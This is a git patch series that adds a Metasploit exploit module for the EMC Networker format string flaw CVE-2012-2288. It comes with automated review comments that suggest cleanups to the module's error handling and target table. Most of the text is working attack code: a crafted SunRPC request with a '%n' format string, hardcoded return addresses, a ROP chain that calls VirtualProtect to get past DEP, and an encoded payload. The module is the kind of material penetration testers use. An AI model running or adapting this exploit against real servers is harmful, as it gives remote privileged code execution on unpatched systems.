From b8eea1007ffa2421354b897e507768eebcd378b3 Mon Sep 17 00:00:00 2001
From: jvazquez-r7
Date: Sat, 3 Nov 2012 18:17:12 +0100
Subject: [PATCH 1/2] Added module for CVE-2012-2288 EMC Networker Format String
---
 .../windows/emc/networker_format_string.rb | 118 ++++++++++++++++++
 1 file changed, 118 insertions(+)
 create mode 100644 modules/exploits/windows/emc/networker_format_string.rb
diff --git a/modules/exploits/windows/emc/networker_format_string.rb b/modules/exploits/windows/emc/networker_format_string.rb
new file mode 100644
index 0000000000..a817c6ac5a
--- /dev/null
+++ b/modules/exploits/windows/emc/networker_format_string.rb
@@ -0,0 +1,118 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = NormalRanking
+
+ include Msf::Exploit::Remote::SunRPC
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'EMC Networker Format String',
+ 'Description' => %q{
+ This module exploits a format string vulnerability in the lg_sprintf function
+ as implemented in liblocal.dll on EMC Networker products. This module exploits the
+ vulnerability by using a specially crafted RPC call to the program number 0x5F3DD,
+ version 0x02, and procedure 0x06. This module has been tested successfully on EMC
+ Networker 7.6 SP3 on Windows XP SP3 and Windows 2003 SP2 (DEP bypass).
+ },
+ 'Author' =>
+ [
+ 'Aaron Portnoy', # Vulnerability Discovery and analysis
+ 'Luigi Auriemma ', # Vulnerability Discovery and analysis
+ 'juan vazquez' # Metasploit module
+ ],
+ 'References' =>
+ [
+ [ 'CVE', '2012-2288' ],
+ [ 'OSVDB', '85116' ],
+ [ 'BID', '55330' ],
+ [ 'URL', 'http://blog.exodusintel.com/2012/08/29/when-wrapping-it-up-goes-wrong/' ],
+ [ 'URL', 'http://aluigi.altervista.org/misc/aluigi0216_story.txt' ]
+ ],
+ 'Platform' => [ 'win' ],
+ 'Payload' =>
+ {
+ 'BadChars' => "\x00\x0d\x0a\x25\x2a",
+ 'DisableNops' => true,
+ 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
+ },
+ 'Targets' =>
+ [
+ ['EMC Networker 7.6 SP3 / Windows XP SP3',
+ {
+ 'Ret' => 0x7c345c30, # push esp # ret from MSVCR71.dll
+ 'Offset' => 156
+ }
+ ],
+ ['EMC Networker 7.6 SP3 / Windows 2003 SP2',
+ {
+ 'Ret' => 0x7c354dac, # ret from MSVCR71.dll
+ 'Offset' => 156
+ }
+ ]
+ ],
+ 'DefaultTarget' => 1,
+ 'Privileged' => true,
+ 'DisclosureDate' => 'Aug 29 2012'))
+
+ end
+
+ def exploit
+
+ begin
+ if (not sunrpc_create('tcp', 0x5F3DD, 
2))
+ fail_with(Exploit::Failure::Unknown, 'sunrpc_create failed')
+ end
+
+ fs = "%n" * target['Offset']
+ fs << [target.ret].pack("V") # push esp # ret from MSVCR71.dll
+ if target.name =~ /Windows 2003/
+ rop_gadgets =
+ [
+ # rop chain generated with mona.py
+ 0x7c354dab, # POP EBP # RETN [MSVCR71.dll]
+ 0x7c354dab, # skip 4 bytes [MSVCR71.dll]
+ 0x7c37678f, # POP EAX # RETN [MSVCR71.dll]
+ 0xfffffdff, # Value to negate, will become 0x00000201
+ 0x7c34d749, # NEG EAX # RETN [MSVCR71.dll]
+ 0x7c362688, # POP EBX # RETN [MSVCR71.dll]
+ 0xffffffff, #
+ 0x7c345255, # INC EBX # FPATAN # RETN [MSVCR71.dll]
+ 0x7c363cff, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [MSVCR71.dll]
+ 0x7c34592b, # POP EDX # RETN [MSVCR71.dll]
+ 0xffffffc0, # Value to negate, will become 0x00000040
+ 0x7c351eb1, # NEG EDX # RETN [MSVCR71.dll]
+ 0x7c37765f, # POP ECX # RETN [MSVCR71.dll]
+ 0x7c38ecfe, # &Writable location [MSVCR71.dll]
+ 0x7c34a490, # POP EDI # RETN [MSVCR71.dll]
+ 0x7c347f98, # RETN (ROP NOP) [MSVCR71.dll]
+ 0x7c364612, # POP ESI # RETN [MSVCR71.dll]
+ 0x7c3415a2, # JMP [EAX] [MSVCR71.dll]
+ 0x7c344cc1, # POP EAX # RETN [MSVCR71.dll]
+ 0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
+ 0x7c378c81, # PUSHAD # ADD AL,0EF # RETN [MSVCR71.dll]
+ 0x7c345c30, # ptr to 'push esp # ret ' [MSVCR71.dll]
+ ].pack("V*")
+ fs << rop_gadgets
+ end
+ fs << payload.encoded
+
+ xdr = XDR.encode(0, 2, rand_text_alpha(10), XDR.encode(fs, rand_text_alpha(10)), 2)
+ sunrpc_call(6, xdr)
+ sunrpc_destroy
+
+ rescue Rex::Proto::SunRPC::RPCTimeout
+ print_error('RPCTimeout')
+ rescue EOFError
+ print_error('EOFError')
+ end
+ end
+
+end
From 88c99161b4d16fe275ea0317e770042801331bb7 Mon Sep 17 00:00:00 2001
From: jvazquez-r7
Date: Sat, 3 Nov 2012 18:52:07 +0100
Subject: [PATCH 2/2] added universal target
---
 .../windows/emc/networker_format_string.rb | 17 +++++++++++++----
 1 file changed, 13 insertions(+), 4 deletions(-)
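Review bot: `sunrpc_destroy` near the end of `exploit` runs only on the success path; when `sunrpc_call` raises `Rex::Proto::SunRPC::RPCTimeout` or `EOFError` the rescue clauses print and return without tearing down the connection opened by `sunrpc_create`. Move the teardown into an `ensure` clause after the two rescues, e.g. `ensure` / `sunrpc_destroy`, guarding it if the mixin does not tolerate a handle that was never created (the `fail_with` path leaves it unset). The messages `'RPCTimeout'` and `'EOFError'` only repeat the exception class name; capturing the exception (`rescue EOFError => e`) and printing `e.message` would make a failed run easier to triage. `fail_with(Exploit::Failure::Unknown, ...)` for a connection that could not be set up would be more precise as `Exploit::Failure::Unreachable`, and the `if (not sunrpc_create(...))` guard reads better as `unless sunrpc_create('tcp', 0x5F3DD, 2)`.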
diff --git a/modules/exploits/windows/emc/networker_format_string.rb b/modules/exploits/windows/emc/networker_format_string.rb
index a817c6ac5a..281dc97a77 100644
--- a/modules/exploits/windows/emc/networker_format_string.rb
+++ b/modules/exploits/windows/emc/networker_format_string.rb
@@ -45,20 +45,29 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Targets' => [ + ['EMC Networker 7.6 SP3 / Windows Universal', + { + 'Ret' => 0x7c354dac, # ret from MSVCR71.dll + 'Offset' => 156, + 'DEP' => true + } + ], ['EMC Networker 7.6 SP3 / Windows XP SP3', { 'Ret' => 0x7c345c30, # push esp # ret from MSVCR71.dll - 'Offset' => 156 + 'Offset' => 156, + 'DEP' => false } ], ['EMC Networker 7.6 SP3 / Windows 2003 SP2', { 'Ret' => 0x7c354dac, # ret from MSVCR71.dll - 'Offset' => 156 + 'Offset' => 156, + 'DEP' => true } ] ], - 'DefaultTarget' => 1, + 'DefaultTarget' => 0, 'Privileged' => true, 'DisclosureDate' => 'Aug 29 2012'))
@@ -73,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote fs = "%n" * target['Offset'] fs << [target.ret].pack("V") # push esp # ret from MSVCR71.dll - if target.name =~ /Windows 2003/ + if target['DEP'] rop_gadgets = [ # rop chain generated with mona.py
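Review bot: The new 'EMC Networker 7.6 SP3 / Windows Universal' target is field-for-field identical to the existing 'Windows 2003 SP2' entry (`Ret` 0x7c354dac, `Offset` 156, `DEP` true), so the two entries differ only in their label; either drop the 2003 entry or add a comment saying why both are kept, e.g. `# Same values as the Universal target; kept so users can select by OS name`. The `'DEP'` key is a module-local convention read by the `exploit` body as `target['DEP']`; a one-line comment on the first target stating that `true` selects the ROP-chain branch would help the next maintainer. The Description still names only XP SP3 and 2003 SP2 as tested, which the 'Universal' label does not reflect; a sentence on what that label is based on would keep the two consistent. The enclosing `initialize` call starts before this hunk.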
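Review bot: The comment `# push esp # ret from MSVCR71.dll` on the context line `fs << [target.ret].pack("V")` is now inaccurate for two of the three targets, since the target table documents the DEP targets' `Ret` as a plain `ret`; with the branch keyed on `target['DEP']` rather than the OS name, reword it to something target-neutral such as `# target-specific return address, see 'Targets'`. The `exploit` method begins and ends outside this hunk.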